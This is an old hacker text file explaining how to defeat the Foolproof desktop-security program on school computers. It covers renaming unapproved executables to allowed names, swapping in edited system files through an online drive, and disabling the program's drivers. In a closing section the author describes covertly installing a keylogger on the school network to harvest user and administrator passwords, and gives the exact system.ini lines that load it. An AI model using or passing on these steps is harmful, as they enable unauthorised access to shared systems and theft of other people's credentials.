|
Sections:
- What is Foolproof?
- Why Foolproof sucks.
- How to get around Foolproof.
- My personal path.
What
is Foolproof?
Foolproof is a Windoze desktop security program, used
almost exclusivly by schools, or any other large institution
where the people using terminals on a network (or even lone
terminals) are not trusted to use the computers freely. It
is a configurable program, and depending on the amount of
precautions taken, certain actions are restricted. Such
actions include when one right clicks, all actions other
than arranging icons are disabled. Although an
understandable precaution on a winblows box, it is more than
the least bit annoying for anyone who uses computers for
more than checking their e-mail or playing java games.
Another rather pesky feature, is the inability to run any
program that has not been previously okayed by
administrators.
Why
Foolproof sucks.
Foolproof is not only annoying, but insulting. Ever since
the days of The ICSS (Incompatable Time-Sharing System) in
Tech-square at MIT, any program or routine a computer is
made to preform that prevents or restricts the full power
and capabilities of the computer, is foolish, insulting, and
more than a little annoying. Although I too, should I find
myself in charge of a network as large as the one in my
former school, would cringe at the mere thought of 900
students, who know as little about computers as they do
anything else, and the constant worry that they might
download a canned hacking program and actually do damage.
However, I feel that the use of computers is a priviledge,
and comprimises must be made and the student body made aware
of the limitations and appropriate uses of the system.
Although my school had such an acceptable use policy, it was
far too harse, limiting use of computers beyond what
Foolproof ever did.
How to
get around Foolproof
-Running Programs-
Here is where our adventures turn interesting. Foolproof,
though initially intimidating, has many gaping holes. First,
and most the easiest to exploit, is the fact that the
routine that checks to mack sure a program is previously
allowed is not path specific; in fact, it uses no
recognition techniques other than the name, so by simply
renaming your program to an allowed program, such as
winword.exe (microsoft word) you can run it- and in the
executeable logs, nothing unusual appears. This is probably
the biggest vulnerability, especially considering that it is
so simple, any idiot who stumbles across such a loophole
could do significant damage to the system. But we don't do
that. We're hackers.
-Editing System Files-
Although this varies depending on the individual system's
configuration, most system files, such as system.ini, or
autoexec.bat; both very important to the informed
individual, are read only. As Foolproof is a boot sector
program, it is often impossible to boot into ms-dos, to
change file permissions. Ms-dos prompts are also restricted.
Thus, if one wishes to alter such a file, do this: First,
you can see the contents of the file- just open it in
microsoft word (notepad is often disallowed;-) and save it
as a txt file. Take it home, and make the necessary
alterations, careful not to do damage(!!!!), make a backup,
and (heres the funny part) upload it to an online drive- you
know- a free hard drive on the internet such as
www.xdrive.com. If you just brought the file into school on
a disk, you couldnt move it into the folder to replace the
existing file, or use any other method to switch them, but,
when downloading files, one is given the option of REPLACING
EXISTING FILES! Jackpot. Now, you can make those changes to
run your C++ compiler, winword.exe (wink wink), without
typing in that whole long ms-dos command. Yes yes, there are
more malicious uses for such system file editing, but we
wont do that. We're hackers.
-Fooling with Foolproof-
Now, I have never done this myself, and i certainly cannot
condone a course of action which would harm a system, but
there are ways to actually remove foolproof, or "0wN" it, if
you will. These vary from subtle editing, to simple
overwriting or removing.
First of all, with some programs, it is possible to simply
ctrl-alt-delete and close the program- not so with
foolproof. If you see it as an available program, it will
not end if you close it. Worth a try though.
The next thing you do requires some research. The default
directory for Foolproof is C:\Sss, so look around- you will
find some .vxd files, and other interesting material. Look
around. I never went so far as to actually edit these, but
one could easily use the way of editing system files shown
above to rewrite these to his/her liking. Among the files
you will find are several .ini files detailing programs
which are allowed- and other interesting permission
material.
If you wanted to, you could just make a blank .vxd file,
with the same name, and replace the existing virtual device
drivers of foolproof, so that they no longer preform their
intended functions. In fact, you could completely eliminate
the system this way. Unfortunatly, there will undoubtably be
unforseen side effects of this, and do so at your own risk
(or better yet, dont).
My
Personal Path.
Using the methods outlined above, I decided that the best
way for me to obtain full access of the schools
Client/server NT network, was to install a keylogger. Sure,
how lame. Maybe so, but they certainly serve a purpose. I
could have downloaded a crappy program, but i went top of
the line, and actually bought (not cracked- programmers need
to eat also) a program called "International Keylogger
Stealth," by Amecisco Ind., available at ameciso.com, or
Keylogger.com. This program, herein after referred to as
"iks" was perfectly tailered to my needs. It was a boot
sector program, and instead of using an automatic installer,
you could install it just by downloading the .vxd file to
the windows\system folder, and then an edited system.ini
file (see below) with 2 entries added. Then, you just place
a file called iks.dat, or anything else .dat somewhere on
the comp, and specify the name and path in system.ini. This
way, the .vxd file logs every keystroke, including NT login
passwords in an encyrped form to the dat file. If someone
were to open the dat file in winword or notepad, it would be
unreadable, displaying random characters. However, if you
upload the .dat file to your drive and download it at home,
and then you run a program called datview.exe, which
decyrpts it and reveals all contained within. Now, you can
use other usernames or even admins passwords to have more
fun. The golden fleece of this method is if you can get an
admins to run foolproof's .exe program, which after prompted
for a password, one can edit the configuration of foolproof.
If you get this, you can do whatever you want. Also, this
way you get all the benifits of keyloggers on public
terminals, including the devious dial-up passwords, and
other acoount information. But dont mis-use it. After all.
We're hackers.
The
System.ini installation.
1. There are two files you should know about:
vikxd.vxd
--- the virtual device driver that logs all keystrokes
datview.exe --- the translator to generate the text file
from binary log
2. Let's suppose that you want iks to log to
c:\kitkat\kitkat1.dat, here is what you can do:
- Copy
vikxd.vxd to c:\windows\system;
- Edit
c:\windows\system.ini, in [386Enh] section, add two entries
"device=vikxd.vxd" and "VikxdLog=c:\kitkat\kitkat1.dat". So
it looks
like:
......
[386Enh]
(other
entries)
(other
entries)
device=vikxd.vxd
VikxdLog=c:\kitkat\kitkat1.dat
......
-
Reboot.
Credits
written by TixO
version 1.0 |